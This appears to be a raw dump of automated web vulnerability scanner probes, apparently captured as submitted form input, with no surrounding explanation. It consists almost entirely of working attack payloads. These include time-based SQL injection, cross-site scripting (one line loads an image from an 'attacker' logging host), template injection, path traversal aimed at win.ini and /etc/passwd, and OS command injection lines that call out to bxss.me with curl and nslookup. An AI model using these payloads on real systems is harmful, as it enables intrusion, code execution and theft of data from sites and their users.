@@2o6UI

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1kmXuJ52T')) OR 656=(SELECT 656 FROM PG_SLEEP(15))--

1tOip6mwH') OR 830=(SELECT 830 FROM PG_SLEEP(15))--

1xFwPvGIZ' OR 127=(SELECT 127 FROM PG_SLEEP(15))--

1-1)) OR 263=(SELECT 263 FROM PG_SLEEP(15))--

1-1) OR 237=(SELECT 237 FROM PG_SLEEP(15))--

1-1 OR 740=(SELECT 740 FROM PG_SLEEP(15))--

16QC9hI4G')); waitfor delay '0:0:15' --

1JpY1TJ2F'); waitfor delay '0:0:15' --

1ORzK0BEu'; waitfor delay '0:0:15' --

1<a2F2SNS<

1<img sRc='http://attacker-9790/log.php?

1<aZF1v60 x=9071>

1<ifRAme sRc=9322.com></IfRamE>

1<WXDIYU>40UN2[!+!]</WXDIYU>

1g6GL2

<InvalidTag >aGCk(9496)</ScRiPt>

1}body{zzz:Expre/**/SSion(aGCk(9496))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=aGCk(9949)>

�<img zzz onmouseover=aGCk(96101) //�>

1&lt;ScRiPt&gt;aGCk(9311)&lt;/sCripT&gt;

1-1 waitfor delay '0:0:15' --

1\u003CScRiPt\aGCk(9588)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%61%47%43%6B%289572%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9346)>

1<img src=xyz OnErRor=aGCk(9273)>

1<img src=//xss.bxss.me/t/dot.gif onload=aGCk(9362)>

1<body onload=aGCk(9723)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9567'>

1<isindex type=image src=1 onerror=aGCk(9662)>

1<svg

� onload=aGCk(9038);>

1<InvalidTag

>aGCk(9361)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9287></ScRiPt>

1<InvalidTag

>aGCk(9814)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%61%47%43%6B%28%39%32%35%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>aGCk(9953)</script>9953

1<InvalidTag>aGCk(9848)</script>

1-1)); waitfor delay '0:0:15' --

1<WRZ8Z4>7ECNV[!+!]</WRZ8Z4>

1<InvalidTag >aGCk(9727)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1

<th:t="${dfb}#foreach

1

1-1); waitfor delay '0:0:15' --

<%={{={@{#{${dfb}}%>

bfgx10346%C0%BEz1%C0%BCz2a%90bcxhjl10346

bfg3952%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3952

19215462

'"()&%<zzz><InvalidTag >aGCk(9287)</ScRiPt>

1'"()&%<zzz><InvalidTag >aGCk(9948)</ScRiPt>

1-1; waitfor delay '0:0:15' --

1<aGcAmjs<

1<img sRc='http://attacker-9098/log.php?

1<a8VJu7C x=9205>

1<ifRAme sRc=9595.com></IfRamE>

1<WW9L5H>R1NIA[!+!]</WW9L5H>

1o2C3k

1}body{zzz:Expre/**/SSion(aGCk(9820))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=aGCk(9337)>

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

�<img zzz onmouseover=aGCk(98691) //�>

1&lt;ScRiPt&gt;aGCk(9027)&lt;/sCripT&gt;

1\u003CScRiPt\aGCk(9571)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%61%47%43%6B%289155%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9978)>

1<img src=xyz OnErRor=aGCk(9155)>

1<img src=//xss.bxss.me/t/dot.gif onload=aGCk(9118)>

1<body onload=aGCk(9432)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9101'>

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

1<isindex type=image src=1 onerror=aGCk(9365)>

1<svg

1<InvalidTag

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9157></ScRiPt>

1<InvalidTag

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%61%47%43%6B%28%39%35%30%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>aGCk(9334)</script>9334

1<InvalidTag>aGCk(9229)</script>

1<W4ZH8U>V2UDS[!+!]</W4ZH8U>

1<InvalidTag >aGCk(9664)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

;(nslookup -q=cname hitzxnwpnuaxi7a7b5.bxss.me||curl hitzxnwpnuaxi7a7b5.bxss.me)|(nslookup -q=cname hitzxnwpnuaxi7a7b5.bxss.me||curl hitzxnwpnuaxi7a7b5.bxss.me)&(nslookup -q=cname hitzxnwpnuaxi7a7b5.bxss.me||curl hitzxnwpnuaxi7a7b5.bxss.me)

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

`(nslookup -q=cname hitemmkmpqyhd6bd09.bxss.me||curl hitemmkmpqyhd6bd09.bxss.me)`

WEB-INF\web.xml

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

WEB-INF/web.xml

|(nslookup -q=cname hitjkpwlewpza7f135.bxss.me||curl hitjkpwlewpza7f135.bxss.me)

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

<th:t="${dfb}#foreach

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&(nslookup -q=cname hitrfwbeukegg895da.bxss.me||curl hitrfwbeukegg895da.bxss.me)&'\"`0&(nslookup -q=cname hitrfwbeukegg895da.bxss.me||curl hitrfwbeukegg895da.bxss.me)&`'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

<%={{={@{#{${dfb}}%>

&nslookup -q=cname hitrsyozlceik465d4.bxss.me&'\"`0&nslookup -q=cname hitrsyozlceik465d4.bxss.me&`'

$(nslookup -q=cname hitsklirlidtac7bcf.bxss.me||curl hitsklirlidtac7bcf.bxss.me)

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

bfgx8118%C0%BEz1%C0%BCz2a%90bcxhjl8118

(nslookup -q=cname hitycfdpjljaieca68.bxss.me||curl hitycfdpjljaieca68.bxss.me))

|echo jdbjqe$()\ loujhc\nz^xyu||a #' |echo jdbjqe$()\ loujhc\nz^xyu||a #|" |echo jdbjqe$()\ loujhc\nz^xyu||a #

..\..\..\..\..\..\..\..\windows\win.ini

bfg1051%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1051

&echo efgbnk$()\ luybhp\nz^xyu||a #' &echo efgbnk$()\ luybhp\nz^xyu||a #|" &echo efgbnk$()\ luybhp\nz^xyu||a #

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

19748136

/../../../../../../../../../../boot.ini

echo fpfhdb$()\ ipmoku\nz^xyu||a #' &echo fpfhdb$()\ ipmoku\nz^xyu||a #|" &echo fpfhdb$()\ ipmoku\nz^xyu||a #

../../../../../../../../../../windows/win.ini%00.jpg

<!--

'"()&%<zzz><InvalidTag >aGCk(9467)</ScRiPt>

C:\WINDOWS\system32\drivers\etc\hosts

'"

file:///etc/passwd

1'"()&%<zzz><InvalidTag >aGCk(9105)</ScRiPt>

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

bxss.me

xfs.bxss.me?hkbakels.com.hk

<!--

c:/windows/win.ini

http://xfs.bxss.me?hkbakels.com.hk

'"

944414

/etc/shells

http://bxss.me/t/fit.txt%3F.jpg

1*if(now()=sysdate(),sleep(15),0)

xfs.bxss.me

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

'+'A'.concat(70-3).concat(22*4).concat(97).concat(70).concat(105).concat(89)+(require'socket'

Socket.gethostbyname('hitrp'+'ezbzbtte89be3.bxss.me.')[3].to_s)+'

bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(121).concat(69).concat(109).concat(85)+(require"socket"

Socket.gethostbyname("hitlg"+"bmnujrhu490a3.bxss.me.")[3].to_s)+"

HttP://bxss.me/t/xss.html?%00


/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"+response.write(9699010*9326158)+"

xfs.bxss.me?hkbakels.com.hk

'+response.write(9699010*9326158)+'

-1" OR 3*2>(0+5+808-808) --

response.write(9699010*9326158)

http://xfs.bxss.me?hkbakels.com.hk

978196

xfs.bxss.me

'+'A'.concat(70-3).concat(22*4).concat(107).concat(84).concat(107).concat(90)+(require'socket'

"+"A".concat(70-3).concat(22*4).concat(114).concat(67).concat(104).concat(72)+(require"socket"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1" OR 3*2<(0+5+808-808) --

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

-1" OR 3+808-808-1=0+0+0+1 --

-1" OR 2+808-808-1=0+0+0+1 --

-1' OR 3*2>(0+5+782-782) or '3x5DzfnI'='

-1' OR 3*2<(0+5+782-782) or '3x5DzfnI'='

-1' OR 3+782-782-1=0+0+0+1 or '3x5DzfnI'='

WEB-INF\web.xml

bxss.me

"+response.write(9450119*9913701)+"

WEB-INF/web.xml

c:/windows/win.ini

'+response.write(9450119*9913701)+'

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

/etc/shells

-1' OR 2+782-782-1=0+0+0+1 or '3x5DzfnI'='

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9450119*9913701)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1' OR 3*2=6 AND 541=541 --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

http://bxss.me/t/fit.txt%3F.jpg

${9999828+10000000}

-1' OR 3*2=5 AND 541=541 --

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

-1' OR 2+1-1+1=1 AND 541=541 --

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

-1' OR 2+1-1-1=1 AND 541=541 --

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

${9999979+9999680}

-1' OR 3*2>(0+5+541-541) --

..\..\..\..\..\..\..\..\windows\win.ini

-1' OR 3*2<(0+5+541-541) --

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

;(nslookup -q=cname hitcssdmkwstrec9e3.bxss.me||curl hitcssdmkwstrec9e3.bxss.me)|(nslookup -q=cname hitcssdmkwstrec9e3.bxss.me||curl hitcssdmkwstrec9e3.bxss.me)&(nslookup -q=cname hitcssdmkwstrec9e3.bxss.me||curl hitcssdmkwstrec9e3.bxss.me)

/../../../../../../../../../../boot.ini

`(nslookup -q=cname hitqpmjigrakz336d8.bxss.me||curl hitqpmjigrakz336d8.bxss.me)`

<esi:include src="http://bxss.me/rpb.png"/>

|(nslookup -q=cname hitiuulpmrspz2a1cf.bxss.me||curl hitiuulpmrspz2a1cf.bxss.me)

&(nslookup -q=cname hitufsqjwjukj9e9ca.bxss.me||curl hitufsqjwjukj9e9ca.bxss.me)&'\"`0&(nslookup -q=cname hitufsqjwjukj9e9ca.bxss.me||curl hitufsqjwjukj9e9ca.bxss.me)&`'

-1' OR 3+541-541-1=0+0+0+1 --

&nslookup -q=cname hityuhjthcjpr74b24.bxss.me&'\"`0&nslookup -q=cname hityuhjthcjpr74b24.bxss.me&`'

-1' OR 2+541-541-1=0+0+0+1 --

../../../../../../../../../../windows/win.ini%00.jpg

'.print(md5(31337)).'

C:\WINDOWS\system32\drivers\etc\hosts

${@print(md5(31337))}\

$(nslookup -q=cname hitnzqmarpmbsafa5c.bxss.me||curl hitnzqmarpmbsafa5c.bxss.me)

<esi:include src="http://bxss.me/rpb.png"/>

(nslookup -q=cname hitiizbczoupj54c68.bxss.me||curl hitiizbczoupj54c68.bxss.me))

-1 OR 3*2>(0+5+952-952)

${@print(md5(31337))}

